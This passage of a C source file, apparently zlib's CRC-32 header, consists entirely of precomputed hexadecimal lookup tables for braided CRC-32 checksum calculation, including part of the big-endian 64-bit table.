0x3e09ad0b, 0xd1cbc635, 0x3afc7d36, 0xd53e1608, 0x24354d85, 0xcbf726bb, 0x20c09db8, 0xcf02f686, 0x2ddeedff, 0xc21c86c1, 0x292b3dc2, 0xc6e956fc, 0x104c8c99, 0xff8ee7a7, 0x14b95ca4, 0xfb7b379a, 0x19a72ce3, 0xf66547dd, 0x1d52fcde, 0xf29097e0, 0x039bcc6d, 0xec59a753, 0x076e1c50, 0xe8ac776e, 0x0a706c17, 0xe5b20729, 0x0e85bc2a, 0xe147d714}, {0x00000000, 0x177b1443, 0x2ef62886, 0x398d3cc5, 0x5dec510c, 0x4a97454f, 0x731a798a, 0x64616dc9, 0xbbd8a218, 0xaca3b65b, 0x952e8a9e, 0x82559edd, 0xe634f314, 0xf14fe757, 0xc8c2db92, 0xdfb9cfd1, 0xacc04271, 0xbbbb5632, 0x82366af7, 0x954d7eb4, 0xf12c137d, 0xe657073e, 0xdfda3bfb, 0xc8a12fb8, 0x1718e069, 0x0063f42a, 0x39eec8ef, 0x2e95dcac, 0x4af4b165, 0x5d8fa526, 0x640299e3, 0x73798da0, 0x82f182a3, 0x958a96e0, 0xac07aa25, 0xbb7cbe66, 0xdf1dd3af, 0xc866c7ec, 0xf1ebfb29, 0xe690ef6a, 0x392920bb, 0x2e5234f8, 0x17df083d, 0x00a41c7e, 0x64c571b7, 0x73be65f4, 0x4a335931, 0x5d484d72, 0x2e31c0d2, 0x394ad491, 0x00c7e854, 0x17bcfc17, 0x73dd91de, 0x64a6859d, 0x5d2bb958, 0x4a50ad1b, 0x95e962ca, 0x82927689, 0xbb1f4a4c, 0xac645e0f, 0xc80533c6, 0xdf7e2785, 0xe6f31b40, 0xf1880f03, 0xde920307, 0xc9e91744, 0xf0642b81, 0xe71f3fc2, 0x837e520b, 0x94054648, 0xad887a8d, 0xbaf36ece, 0x654aa11f, 0x7231b55c, 0x4bbc8999, 0x5cc79dda, 0x38a6f013, 0x2fdde450, 0x1650d895, 0x012bccd6, 0x72524176, 0x65295535, 0x5ca469f0, 0x4bdf7db3, 0x2fbe107a, 0x38c50439, 0x014838fc, 0x16332cbf, 0xc98ae36e, 0xdef1f72d, 0xe77ccbe8, 0xf007dfab, 0x9466b262, 0x831da621, 0xba909ae4, 0xadeb8ea7, 0x5c6381a4, 0x4b1895e7, 0x7295a922, 0x65eebd61, 0x018fd0a8, 0x16f4c4eb, 0x2f79f82e, 0x3802ec6d, 0xe7bb23bc, 0xf0c037ff, 0xc94d0b3a, 0xde361f79, 0xba5772b0, 0xad2c66f3, 0x94a15a36, 0x83da4e75, 0xf0a3c3d5, 0xe7d8d796, 0xde55eb53, 0xc92eff10, 0xad4f92d9, 0xba34869a, 0x83b9ba5f, 0x94c2ae1c, 0x4b7b61cd, 0x5c00758e, 0x658d494b, 0x72f65d08, 0x169730c1, 0x01ec2482, 0x38611847, 0x2f1a0c04, 0x6655004f, 0x712e140c, 0x48a328c9, 0x5fd83c8a, 0x3bb95143, 0x2cc24500, 0x154f79c5, 0x02346d86, 0xdd8da257, 0xcaf6b614, 0xf37b8ad1, 0xe4009e92, 0x8061f35b, 0x971ae718, 0xae97dbdd, 0xb9eccf9e, 0xca95423e, 0xddee567d, 0xe4636ab8, 0xf3187efb, 0x97791332, 0x80020771, 0xb98f3bb4, 0xaef42ff7, 0x714de026, 0x6636f465, 0x5fbbc8a0, 0x48c0dce3, 0x2ca1b12a, 0x3bdaa569, 0x025799ac, 0x152c8def, 0xe4a482ec, 0xf3df96af, 0xca52aa6a, 0xdd29be29, 0xb948d3e0, 0xae33c7a3, 0x97befb66, 0x80c5ef25, 0x5f7c20f4, 0x480734b7, 0x718a0872, 0x66f11c31, 0x029071f8, 0x15eb65bb, 0x2c66597e, 0x3b1d4d3d, 0x4864c09d, 0x5f1fd4de, 0x6692e81b, 0x71e9fc58, 0x15889191, 0x02f385d2, 0x3b7eb917, 0x2c05ad54, 0xf3bc6285, 0xe4c776c6, 0xdd4a4a03, 0xca315e40, 0xae503389, 0xb92b27ca, 0x80a61b0f, 0x97dd0f4c, 0xb8c70348, 0xafbc170b, 0x96312bce, 0x814a3f8d, 0xe52b5244, 0xf2504607, 0xcbdd7ac2, 0xdca66e81, 0x031fa150, 0x1464b513, 0x2de989d6, 0x3a929d95, 0x5ef3f05c, 0x4988e41f, 0x7005d8da, 0x677ecc99, 0x14074139, 0x037c557a, 0x3af169bf, 0x2d8a7dfc, 0x49eb1035, 0x5e900476, 0x671d38b3, 0x70662cf0, 0xafdfe321, 0xb8a4f762, 0x8129cba7, 0x9652dfe4, 0xf233b22d, 0xe548a66e, 0xdcc59aab, 0xcbbe8ee8, 0x3a3681eb, 0x2d4d95a8, 0x14c0a96d, 0x03bbbd2e, 0x67dad0e7, 0x70a1c4a4, 0x492cf861, 0x5e57ec22, 0x81ee23f3, 0x969537b0, 0xaf180b75, 0xb8631f36, 0xdc0272ff, 0xcb7966bc, 0xf2f45a79, 0xe58f4e3a, 0x96f6c39a, 0x818dd7d9, 0xb800eb1c, 0xaf7bff5f, 0xcb1a9296, 0xdc6186d5, 0xe5ecba10, 0xf297ae53, 0x2d2e6182, 0x3a5575c1, 0x03d84904, 0x14a35d47, 0x70c2308e, 0x67b924cd, 0x5e341808, 0x494f0c4b}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x43147b1700000000, 0x8628f62e00000000, 0xc53c8d3900000000, 0x0c51ec5d00000000, 0x4f45974a00000000, 0x8a791a7300000000, 0xc96d616400000000, 0x18a2d8bb00000000, 0x5bb6a3ac00000000, 0x9e8a2e9500000000, 0xdd9e558200000000, 0x14f334e600000000, 0x57e74ff100000000, 0x92dbc2c800000000, 0xd1cfb9df00000000, 0x7142c0ac00000000, 0x3256bbbb00000000, 0xf76a368200000000, 0xb47e4d9500000000, 0x7d132cf100000000, 0x3e0757e600000000, 0xfb3bdadf00000000, 0xb82fa1c800000000, 0x69e0181700000000, 0x2af4630000000000, 0xefc8ee3900000000, 0xacdc952e00000000, 0x65b1f44a00000000, 0x26a58f5d00000000, 0xe399026400000000, 0xa08d797300000000, 0xa382f18200000000, 0xe0968a9500000000, 0x25aa07ac00000000, 0x66be7cbb00000000, 0xafd31ddf00000000, 0xecc766c800000000, 0x29fbebf100000000, 0x6aef90e600000000, 0xbb20293900000000, 0xf834522e00000000, 0x3d08df1700000000, 0x7e1ca40000000000, 0xb771c56400000000, 0xf465be7300000000, 0x3159334a00000000, 0x724d485d00000000, 0xd2c0312e00000000, 0x91d44a3900000000, 0x54e8c70000000000, 0x17fcbc1700000000, 0xde91dd7300000000, 0x9d85a66400000000, 0x58b92b5d00000000, 0x1bad504a00000000, 0xca62e99500000000, 0x8976928200000000, 0x4c4a1fbb00000000, 0x0f5e64ac00000000, 0xc63305c800000000, 0x85277edf00000000, 0x401bf3e600000000, 0x030f88f100000000, 0x070392de00000000, 0x4417e9c900000000, 0x812b64f000000000, 0xc23f1fe700000000, 0x0b527e8300000000, 0x4846059400000000, 0x8d7a88ad00000000, 0xce6ef3ba00000000, 0x1fa14a6500000000, 0x5cb5317200000000, 0x9989bc4b00000000, 0xda9dc75c00000000, 0x13f0a63800000000, 0x50e4dd2f00000000, 0x95d8501600000000, 0xd6cc2b0100000000, 0x7641527200000000, 0x3555296500000000, 0xf069a45c00000000, 0xb37ddf4b00000000, 0x7a10be2f00000000, 0x3904c53800000000, 0xfc38480100000000, 0xbf2c331600000000, 0x6ee38ac900000000, 0x2df7f1de00000000, 0xe8cb7ce700000000, 0xabdf07f000000000, 0x62b2669400000000, 0x21a61d8300000000, 0xe49a90ba00000000, 0xa78eebad00000000, 0xa481635c00000000, 0xe795184b00000000, 0x22a9957200000000, 0x61bdee6500000000, 0xa8d08f0100000000, 0xebc4f41600000000, 0x2ef8792f00000000, 0x6dec023800000000, 0xbc23bbe700000000, 0xff37c0f000000000, 0x3a0b4dc900000000, 0x791f36de00000000, 0xb07257ba00000000, 0xf3662cad00000000, 0x365aa19400000000, 0x754eda8300000000, 0xd5c3a3f000000000, 0x96d7d8e700000000, 0x53eb55de00000000, 0x10ff2ec900000000, 0xd9924fad00000000, 0x9a8634ba00000000, 0x5fbab98300000000, 0x1caec29400000000, 0xcd617b4b00000000, 0x8e75005c00000000, 0x4b498d6500000000, 0x085df67200000000, 0xc130971600000000, 0x8224ec0100000000, 0x4718613800000000, 0x040c1a2f00000000, 0x4f00556600000000, 0x0c142e7100000000, 0xc928a34800000000, 0x8a3cd85f00000000, 0x4351b93b00000000, 0x0045c22c00000000, 0xc5794f1500000000, 0x866d340200000000, 0x57a28ddd00000000, 0x14b6f6ca00000000, 0xd18a7bf300000000, 0x929e00e400000000, 0x5bf3618000000000, 0x18e71a9700000000, 0xdddb97ae00000000, 0x9ecfecb900000000, 0x3e4295ca00000000, 0x7d56eedd00000000, 0xb86a63e400000000, 0xfb7e18f300000000, 0x3213799700000000, 0x7107028000000000, 0xb43b8fb900000000, 0xf72ff4ae00000000, 0x26e04d7100000000, 0x65f4366600000000, 0xa0c8bb5f00000000, 0xe3dcc04800000000, 0x2ab1a12c00000000, 0x69a5da3b00000000, 0xac99570200000000, 0xef8d2c1500000000, 0xec82a4e400000000, 0xaf96dff300000000, 0x6aaa52ca00000000, 0x29be29dd00000000, 0xe0d348b900000000, 0xa3c733ae00000000, 0x66fbbe9700000000, 0x25efc58000000000, 0xf4207c5f00000000, 0xb734074800000000, 0x72088a7100000000, 0x311cf16600000000, 0xf871900200000000, 0xbb65eb1500000000, 0x7e59662c00000000, 0x3d4d1d3b00000000, 0x9dc0644800000000, 0xded41f5f00000000, 0x1be8926600000000, 0x58fce97100000000, 0x9191881500000000, 0xd285f30200000000, 0x17b97e3b00000000, 0x54ad052c00000000, 0x8562bcf300000000, 0xc676c7e400000000, 0x034a4add00000000, 0x405e31ca00000000, 0x893350ae00000000, 0xca272bb900000000, 0x0f1ba68000000000, 0x4c0fdd9700000000, 0x4803c7b800000000, 0x0b17bcaf00000000, 0xce2b319600000000, 0x8d3f4a8100000000, 0x44522be500000000, 0x074650f200000000, 0xc27addcb00000000, 0x816ea6dc00000000, 0x50a11f0300000000, 0x13b5641400000000, 0xd689e92d00000000, 0x959d923a00000000, 0x5cf0f35e00000000, 0x1fe4884900000000, 0xdad8057000000000, 0x99cc7e6700000000, 0x3941071400000000, 0x7a557c0300000000, 0xbf69f13a00000000, 0xfc7d8a2d00000000, 0x3510eb4900000000, 0x7604905e00000000, 0xb3381d6700000000, 0xf02c667000000000, 0x21e3dfaf00000000, 0x62f7a4b800000000, 0xa7cb298100000000, 0xe4df529600000000, 0x2db233f200000000, 0x6ea648e500000000, 0xab9ac5dc00000000, 0xe88ebecb00000000, 0xeb81363a00000000, 0xa8954d2d00000000, 0x6da9c01400000000, 0x2ebdbb0300000000, 0xe7d0da6700000000, 0xa4c4a17000000000, 0x61f82c4900000000, 0x22ec575e00000000, 0xf323ee8100000000, 0xb037959600000000, 0x750b18af00000000, 0x361f63b800000000, 0xff7202dc00000000, 0xbc6679cb00000000, 0x795af4f200000000, 0x3a4e8fe500000000, 0x9ac3f69600000000, 0xd9d78d8100000000, 0x1ceb00b800000000, 0x5fff7baf00000000, 0x96921acb00000000, 0xd58661dc00000000, 0x10baece500000000, 0x53ae97f200000000, 0x82612e2d00000000, 0xc175553a00000000, 0x0449d80300000000, 0x475da31400000000, 0x8e30c27000000000, 0xcd24b96700000000, 0x0818345e00000000, 0x4b0c4f4900000000}, {0x0000000000000000, 0x3e6bc2ef00000000, 0x3dd0f50400000000, 0x03bb37eb00000000, 0x7aa0eb0900000000, 0x44cb29e600000000, 0x47701e0d00000000, 0x791bdce200000000, 0xf440d71300000000, 0xca2b15fc00000000, 0xc990221700000000, 0xf7fbe0f800000000, 0x8ee03c1a00000000, 0xb08bfef500000000, 0xb330c91e00000000, 0x8d5b0bf100000000, 0xe881ae2700000000, 0xd6ea6cc800000000, 0xd5515b2300000000, 0xeb3a99cc00000000, 0x9221452e00000000, 0xac4a87c100000000, 0xaff1b02a00000000, 0x919a72c500000000, 0x1cc1793400000000, 0x22aabbdb00000000, 0x21118c3000000000, 0x1f7a4edf00000000, 0x6661923d00000000, 0x580a50d200000000, 0x5bb1673900000000, 0x65daa5d600000000, 0xd0035d4f00000000, 0xee689fa000000000, 0xedd3a84b00000000, 0xd3b86aa400000000, 0xaaa3b64600000000, 0x94c874a900000000, 0x9773434200000000, 0xa91881ad00000000, 0x24438a5c00000000, 0x1a2848b300000000, 0x19937f5800000000, 0x27f8bdb700000000, 0x5ee3615500000000, 0x6088a3ba00000000, 0x6333945100000000, 0x5d5856be00000000, 0x3882f36800000000, 0x06e9318700000000, 0x0552066c00000000, 0x3b39c48300000000, 0x4222186100000000, 0x7c49da8e00000000, 0x7ff2ed6500000000, 0x41992f8a00000000, 0xccc2247b00000000, 0xf2a9e69400000000, 0xf112d17f00000000, 0xcf79139000000000, 0xb662cf7200000000, 0x88090d9d00000000, 0x8bb23a7600000000, 0xb5d9f89900000000, 0xa007ba9e00000000, 0x9e6c787100000000, 0x9dd74f9a00000000, 0xa3bc8d7500000000, 0xdaa7519700000000, 0xe4cc937800000000, 0xe777a49300000000, 0xd91c667c00000000, 0x54476d8d00000000, 0x6a2caf6200000000, 0x6997988900000000, 0x57fc5a6600000000, 0x2ee7868400000000, 0x108c446b00000000, 0x1337738000000000, 0x2d5cb16f00000000, 0x488614b900000000, 0x76edd65600000000, 0x7556e1bd00000000, 0x4b3d235200000000, 0x3226ffb000000000, 0x0c4d3d5f00000000, 0x0ff60ab400000000, 0x319dc85b00000000, 0xbcc6c3aa00000000, 0x82ad014500000000, 0x811636ae00000000, 0xbf7df44100000000, 0xc66628a300000000, 0xf80dea4c00000000, 0xfbb6dda700000000, 0xc5dd1f4800000000, 0x7004e7d100000000, 0x4e6f253e00000000, 0x4dd412d500000000, 0x73bfd03a00000000, 0x0aa40cd800000000, 0x34cfce3700000000, 0x3774f9dc00000000, 0x091f3b3300000000, 0x844430c200000000, 0xba2ff22d00000000, 0xb994c5c600000000, 0x87ff072900000000, 0xfee4dbcb00000000, 0xc08f192400000000, 0xc3342ecf00000000, 0xfd5fec2000000000, 0x988549f600000000, 0xa6ee8b1900000000, 0xa555bcf200000000, 0x9b3e7e1d00000000, 0xe225a2ff00000000, 0xdc4e601000000000, 0xdff557fb00000000, 0xe19e951400000000, 0x6cc59ee500000000, 0x52ae5c0a00000000, 0x51156be100000000, 0x6f7ea90e00000000, 0x166575ec00000000, 0x280eb70300000000, 0x2bb580e800000000, 0x15de420700000000, 0x010905e600000000, 0x3f62c70900000000, 0x3cd9f0e200000000, 0x02b2320d00000000, 0x7ba9eeef00000000, 0x45c22c0000000000, 0x46791beb00000000, 0x7812d90400000000, 0xf549d2f500000000, 0xcb22101a00000000, 0xc89927f100000000, 0xf6f2e51e00000000, 0x8fe939fc00000000, 0xb182fb1300000000, 0xb239ccf800000000, 0x8c520e1700000000, 0xe988abc100000000, 0xd7e3692e00000000, 0xd4585ec500000000, 0xea339c2a00000000, 0x932840c800000000, 0xad43822700000000, 0xaef8b5cc00000000, 0x9093772300000000, 0x1dc87cd200000000, 0x23a3be3d00000000, 0x201889d600000000, 0x1e734b3900000000, 0x676897db00000000, 0x5903553400000000, 0x5ab862df00000000, 0x64d3a03000000000, 0xd10a58a900000000, 0xef619a4600000000, 0xecdaadad00000000, 0xd2b16f4200000000, 0xabaab3a000000000, 0x95c1714f00000000, 0x967a46a400000000, 0xa811844b00000000, 0x254a8fba00000000, 0x1b214d5500000000, 0x189a7abe00000000, 0x26f1b85100000000, 0x5fea64b300000000, 0x6181a65c00000000, 0x623a91b700000000, 0x5c51535800000000, 0x398bf68e00000000, 0x07e0346100000000, 0x045b038a00000000, 0x3a30c16500000000, 0x432b1d8700000000, 0x7d40df6800000000, 0x7efbe88300000000, 0x40902a6c00000000, 0xcdcb219d00000000, 0xf3a0e37200000000, 0xf01bd49900000000, 0xce70167600000000, 0xb76bca9400000000, 0x8900087b00000000, 0x8abb3f9000000000, 0xb4d0fd7f00000000, 0xa10ebf7800000000, 0x9f657d9700000000, 0x9cde4a7c00000000, 0xa2b5889300000000, 0xdbae547100000000, 0xe5c5969e00000000, 0xe67ea17500000000, 0xd815639a00000000, 0x554e686b00000000, 0x6b25aa8400000000, 0x689e9d6f00000000, 0x56f55f8000000000, 0x2fee836200000000, 0x1185418d00000000, 0x123e766600000000, 0x2c55b48900000000, 0x498f115f00000000, 0x77e4d3b000000000, 0x745fe45b00000000, 0x4a3426b400000000, 0x332ffa5600000000, 0x0d4438b900000000, 0x0eff0f5200000000, 0x3094cdbd00000000, 0xbdcfc64c00000000, 0x83a404a300000000, 0x801f334800000000, 0xbe74f1a700000000, 0xc76f2d4500000000, 0xf904efaa00000000, 0xfabfd84100000000, 0xc4d41aae00000000, 0x710de23700000000, 0x4f6620d800000000, 0x4cdd173300000000, 0x72b6d5dc00000000, 0x0bad093e00000000, 0x35c6cbd100000000, 0x367dfc3a00000000, 0x08163ed500000000, 0x854d352400000000, 0xbb26f7cb00000000, 0xb89dc02000000000, 0x86f602cf00000000, 0xffedde2d00000000, 0xc1861cc200000000, 0xc23d2b2900000000, 0xfc56e9c600000000, 0x998c4c1000000000, 0xa7e78eff00000000, 0xa45cb91400000000, 0x9a377bfb00000000, 0xe32ca71900000000, 0xdd4765f600000000, 0xdefc521d00000000, 0xe09790f200000000, 0x6dcc9b0300000000, 0x53a759ec00000000, 0x501c6e0700000000, 0x6e77ace800000000, 0x176c700a00000000, 0x2907b2e500000000, 0x2abc850e00000000, 0x14d747e100000000}, {0x0000000000000000, 0xc0df8ec100000000, 0xc1b96c5800000000, 0x0166e29900000000, 0x8273d9b000000000, 0x42ac577100000000, 0x43cab5e800000000, 0x83153b2900000000, 0x45e1c3ba00000000, 0x853e4d7b00000000, 0x8458afe200000000, 0x4487212300000000, 0xc7921a0a00000000, 0x074d94cb00000000, 0x062b765200000000, 0xc6f4f89300000000, 0xcbc4f6ae00000000, 0x0b1b786f00000000, 0x0a7d9af600000000, 0xcaa2143700000000, 0x49b72f1e00000000, 0x8968a1df00000000, 0x880e434600000000, 0x48d1cd8700000000, 0x8e25351400000000, 0x4efabbd500000000, 0x4f9c594c00000000, 0x8f43d78d00000000, 0x0c56eca400000000, 0xcc89626500000000, 0xcdef80fc00000000, 0x0d300e3d00000000, 0xd78f9c8600000000, 0x1750124700000000, 0x1636f0de00000000, 0xd6e97e1f00000000, 0x55fc453600000000, 0x9523cbf700000000, 0x9445296e00000000, 0x549aa7af00000000, 0x926e5f3c00000000, 0x52b1d1fd00000000, 0x53d7336400000000, 0x9308bda500000000, 0x101d868c00000000, 0xd0c2084d00000000, 0xd1a4ead400000000, 0x117b641500000000, 0x1c4b6a2800000000, 0xdc94e4e900000000, 0xddf2067000000000, 0x1d2d88b100000000, 0x9e38b39800000000, 0x5ee73d5900000000, 0x5f81dfc000000000, 0x9f5e510100000000, 0x59aaa99200000000, 0x9975275300000000, 0x9813c5ca00000000, 0x58cc4b0b00000000, 0xdbd9702200000000, 0x1b06fee300000000, 0x1a601c7a00000000, 0xdabf92bb00000000, 0xef1948d600000000, 0x2fc6c61700000000, 0x2ea0248e00000000, 0xee7faa4f00000000, 0x6d6a916600000000, 0xadb51fa700000000, 0xacd3fd3e00000000, 0x6c0c73ff00000000, 0xaaf88b6c00000000, 0x6a2705ad00000000, 0x6b41e73400000000, 0xab9e69f500000000, 0x288b52dc00000000, 0xe854dc1d00000000, 0xe9323e8400000000, 0x29edb04500000000, 0x24ddbe7800000000, 0xe40230b900000000, 0xe564d22000000000, 0x25bb5ce100000000, 0xa6ae67c800000000, 0x6671e90900000000, 0x67170b9000000000, 0xa7c8855100000000, 0x613c7dc200000000, 0xa1e3f30300000000, 0xa085119a00000000, 0x605a9f5b00000000, 0xe34fa47200000000, 0x23902ab300000000, 0x22f6c82a00000000, 0xe22946eb00000000, 0x3896d45000000000, 0xf8495a9100000000, 0xf92fb80800000000, 0x39f036c900000000, 0xbae50de000000000, 0x7a3a832100000000, 0x7b5c61b800000000, 0xbb83ef7900000000, 0x7d7717ea00000000, 0xbda8992b00000000, 0xbcce7bb200000000, 0x7c11f57300000000, 0xff04ce5a00000000, 0x3fdb409b00000000, 0x3ebda20200000000, 0xfe622cc300000000, 0xf35222fe00000000, 0x338dac3f00000000, 0x32eb4ea600000000, 0xf234c06700000000, 0x7121fb4e00000000, 0xb1fe758f00000000, 0xb098971600000000, 0x704719d700000000, 0xb6b3e14400000000, 0x766c6f8500000000, 0x770a8d1c00000000, 0xb7d503dd00000000, 0x34c038f400000000, 0xf41fb63500000000, 0xf57954ac00000000, 0x35a6da6d00000000, 0x9f35e17700000000, 0x5fea6fb600000000, 0x5e8c8d2f00000000, 0x9e5303ee00000000, 0x1d4638c700000000, 0xdd99b60600000000, 0xdcff549f00000000, 0x1c20da5e00000000, 0xdad422cd00000000, 0x1a0bac0c00000000, 0x1b6d4e9500000000, 0xdbb2c05400000000, 0x58a7fb7d00000000, 0x987875bc00000000, 0x991e972500000000, 0x59c119e400000000, 0x54f117d900000000, 0x942e991800000000, 0x95487b8100000000, 0x5597f54000000000, 0xd682ce6900000000, 0x165d40a800000000, 0x173ba23100000000, 0xd7e42cf000000000, 0x1110d46300000000, 0xd1cf5aa200000000, 0xd0a9b83b00000000, 0x107636fa00000000, 0x93630dd300000000, 0x53bc831200000000, 0x52da618b00000000, 0x9205ef4a00000000, 0x48ba7df100000000, 0x8865f33000000000, 0x890311a900000000, 0x49dc9f6800000000, 0xcac9a44100000000, 0x0a162a8000000000, 0x0b70c81900000000, 0xcbaf46d800000000, 0x0d5bbe4b00000000, 0xcd84308a00000000, 0xcce2d21300000000, 0x0c3d5cd200000000, 0x8f2867fb00000000, 0x4ff7e93a00000000, 0x4e910ba300000000, 0x8e4e856200000000, 0x837e8b5f00000000, 0x43a1059e00000000, 0x42c7e70700000000, 0x821869c600000000, 0x010d52ef00000000, 0xc1d2dc2e00000000, 0xc0b43eb700000000, 0x006bb07600000000, 0xc69f48e500000000, 0x0640c62400000000, 0x072624bd00000000, 0xc7f9aa7c00000000, 0x44ec915500000000, 0x84331f9400000000, 0x8555fd0d00000000, 0x458a73cc00000000, 0x702ca9a100000000, 0xb0f3276000000000, 0xb195c5f900000000, 0x714a4b3800000000, 0xf25f701100000000, 0x3280fed000000000, 0x33e61c4900000000, 0xf339928800000000, 0x35cd6a1b00000000, 0xf512e4da00000000, 0xf474064300000000, 0x34ab888200000000, 0xb7beb3ab00000000, 0x77613d6a00000000, 0x7607dff300000000, 0xb6d8513200000000, 0xbbe85f0f00000000, 0x7b37d1ce00000000, 0x7a51335700000000, 0xba8ebd9600000000, 0x399b86bf00000000, 0xf944087e00000000, 0xf822eae700000000, 0x38fd642600000000, 0xfe099cb500000000, 0x3ed6127400000000, 0x3fb0f0ed00000000, 0xff6f7e2c00000000, 0x7c7a450500000000, 0xbca5cbc400000000, 0xbdc3295d00000000, 0x7d1ca79c00000000, 0xa7a3352700000000, 0x677cbbe600000000, 0x661a597f00000000, 0xa6c5d7be00000000, 0x25d0ec9700000000, 0xe50f625600000000, 0xe46980cf00000000, 0x24b60e0e00000000, 0xe242f69d00000000, 0x229d785c00000000, 0x23fb9ac500000000, 0xe324140400000000, 0x60312f2d00000000, 0xa0eea1ec00000000, 0xa188437500000000, 0x6157cdb400000000, 0x6c67c38900000000, 0xacb84d4800000000, 0xaddeafd100000000, 0x6d01211000000000, 0xee141a3900000000, 0x2ecb94f800000000, 0x2fad766100000000, 0xef72f8a000000000, 0x2986003300000000, 0xe9598ef200000000, 0xe83f6c6b00000000, 0x28e0e2aa00000000, 0xabf5d98300000000, 0x6b2a574200000000, 0x6a4cb5db00000000, 0xaa933b1a00000000}, {0x0000000000000000, 0x6f4ca59b00000000, 0x9f9e3bec00000000, 0xf0d29e7700000000, 0x7f3b060300000000, 0x1077a39800000000, 0xe0a53def00000000, 0x8fe9987400000000, 0xfe760c0600000000, 0x913aa99d00000000, 0x61e837ea00000000, 0x0ea4927100000000, 0x814d0a0500000000, 0xee01af9e00000000, 0x1ed331e900000000, 0x719f947200000000, 0xfced180c00000000, 0x93a1bd9700000000, 0x637323e000000000, 0x0c3f867b00000000, 0x83d61e0f00000000, 0xec9abb9400000000, 0x1c4825e300000000, 0x7304807800000000, 0x029b140a00000000, 0x6dd7b19100000000, 0x9d052fe600000000, 0xf2498a7d00000000, 0x7da0120900000000, 0x12ecb79200000000, 0xe23e29e500000000, 0x8d728c7e00000000, 0xf8db311800000000, 0x9797948300000000, 0x67450af400000000, 0x0809af6f00000000, 0x87e0371b00000000, 0xe8ac928000000000, 0x187e0cf700000000, 0x7732a96c00000000, 0x06ad3d1e00000000, 0x69e1988500000000, 0x993306f200000000, 0xf67fa36900000000, 0x79963b1d00000000, 0x16da9e8600000000, 0xe60800f100000000, 0x8944a56a00000000, 0x0436291400000000, 0x6b7a8c8f00000000, 0x9ba812f800000000, 0xf4e4b76300000000, 0x7b0d2f1700000000, 0x14418a8c00000000, 0xe49314fb00000000, 0x8bdfb16000000000, 0xfa40251200000000, 0x950c808900000000, 0x65de1efe00000000, 0x0a92bb6500000000, 0x857b231100000000, 0xea37868a00000000, 0x1ae518fd00000000, 0x75a9bd6600000000, 0xf0b7633000000000, 0x9ffbc6ab00000000, 0x6f2958dc00000000, 0x0065fd4700000000, 0x8f8c653300000000, 0xe0c0c0a800000000, 0x10125edf00000000, 0x7f5efb4400000000, 0x0ec16f3600000000, 0x618dcaad00000000, 0x915f54da00000000, 0xfe13f14100000000, 0x71fa693500000000, 0x1eb6ccae00000000, 0xee6452d900000000, 0x8128f74200000000, 0x0c5a7b3c00000000, 0x6316dea700000000, 0x93c440d000000000, 0xfc88e54b00000000, 0x73617d3f00000000, 0x1c2dd8a400000000, 0xecff46d300000000, 0x83b3e34800000000, 0xf22c773a00000000, 0x9d60d2a100000000, 0x6db24cd600000000, 0x02fee94d00000000, 0x8d17713900000000, 0xe25bd4a200000000, 0x12894ad500000000, 0x7dc5ef4e00000000, 0x086c522800000000, 0x6720f7b300000000, 0x97f269c400000000, 0xf8becc5f00000000, 0x7757542b00000000, 0x181bf1b000000000, 0xe8c96fc700000000, 0x8785ca5c00000000, 0xf61a5e2e00000000, 0x9956fbb500000000, 0x698465c200000000, 0x06c8c05900000000, 0x8921582d00000000, 0xe66dfdb600000000, 0x16bf63c100000000, 0x79f3c65a00000000, 0xf4814a2400000000, 0x9bcdefbf00000000, 0x6b1f71c800000000, 0x0453d45300000000, 0x8bba4c2700000000, 0xe4f6e9bc00000000, 0x142477cb00000000, 0x7b68d25000000000, 0x0af7462200000000, 0x65bbe3b900000000, 0x95697dce00000000, 0xfa25d85500000000, 0x75cc402100000000, 0x1a80e5ba00000000, 0xea527bcd00000000, 0x851ede5600000000, 0xe06fc76000000000, 0x8f2362fb00000000, 0x7ff1fc8c00000000, 0x10bd591700000000, 0x9f54c16300000000, 0xf01864f800000000, 0x00cafa8f00000000, 0x6f865f1400000000, 0x1e19cb6600000000, 0x71556efd00000000, 0x8187f08a00000000, 0xeecb551100000000, 0x6122cd6500000000, 0x0e6e68fe00000000, 0xfebcf68900000000, 0x91f0531200000000, 0x1c82df6c00000000, 0x73ce7af700000000, 0x831ce48000000000, 0xec50411b00000000, 0x63b9d96f00000000, 0x0cf57cf400000000, 0xfc27e28300000000, 0x936b471800000000, 0xe2f4d36a00000000, 0x8db876f100000000, 0x7d6ae88600000000, 0x12264d1d00000000, 0x9dcfd56900000000, 0xf28370f200000000, 0x0251ee8500000000, 0x6d1d4b1e00000000, 0x18b4f67800000000, 0x77f853e300000000, 0x872acd9400000000, 0xe866680f00000000, 0x678ff07b00000000, 0x08c355e000000000, 0xf811cb9700000000, 0x975d6e0c00000000, 0xe6c2fa7e00000000, 0x898e5fe500000000, 0x795cc19200000000, 0x1610640900000000, 0x99f9fc7d00000000, 0xf6b559e600000000, 0x0667c79100000000, 0x692b620a00000000, 0xe459ee7400000000, 0x8b154bef00000000, 0x7bc7d59800000000, 0x148b700300000000, 0x9b62e87700000000, 0xf42e4dec00000000, 0x04fcd39b00000000, 0x6bb0760000000000, 0x1a2fe27200000000, 0x756347e900000000, 0x85b1d99e00000000, 0xeafd7c0500000000, 0x6514e47100000000, 0x0a5841ea00000000, 0xfa8adf9d00000000, 0x95c67a0600000000, 0x10d8a45000000000, 0x7f9401cb00000000, 0x8f469fbc00000000, 0xe00a3a2700000000, 0x6fe3a25300000000, 0x00af07c800000000, 0xf07d99bf00000000, 0x9f313c2400000000, 0xeeaea85600000000, 0x81e20dcd00000000, 0x713093ba00000000, 0x1e7c362100000000, 0x9195ae5500000000, 0xfed90bce00000000, 0x0e0b95b900000000, 0x6147302200000000, 0xec35bc5c00000000, 0x837919c700000000, 0x73ab87b000000000, 0x1ce7222b00000000, 0x930eba5f00000000, 0xfc421fc400000000, 0x0c9081b300000000, 0x63dc242800000000, 0x1243b05a00000000, 0x7d0f15c100000000, 0x8ddd8bb600000000, 0xe2912e2d00000000, 0x6d78b65900000000, 0x023413c200000000, 0xf2e68db500000000, 0x9daa282e00000000, 0xe803954800000000, 0x874f30d300000000, 0x779daea400000000, 0x18d10b3f00000000, 0x9738934b00000000, 0xf87436d000000000, 0x08a6a8a700000000, 0x67ea0d3c00000000, 0x1675994e00000000, 0x79393cd500000000, 0x89eba2a200000000, 0xe6a7073900000000, 0x694e9f4d00000000, 0x06023ad600000000, 0xf6d0a4a100000000, 0x999c013a00000000, 0x14ee8d4400000000, 0x7ba228df00000000, 0x8b70b6a800000000, 0xe43c133300000000, 0x6bd58b4700000000, 0x04992edc00000000, 0xf44bb0ab00000000, 0x9b07153000000000, 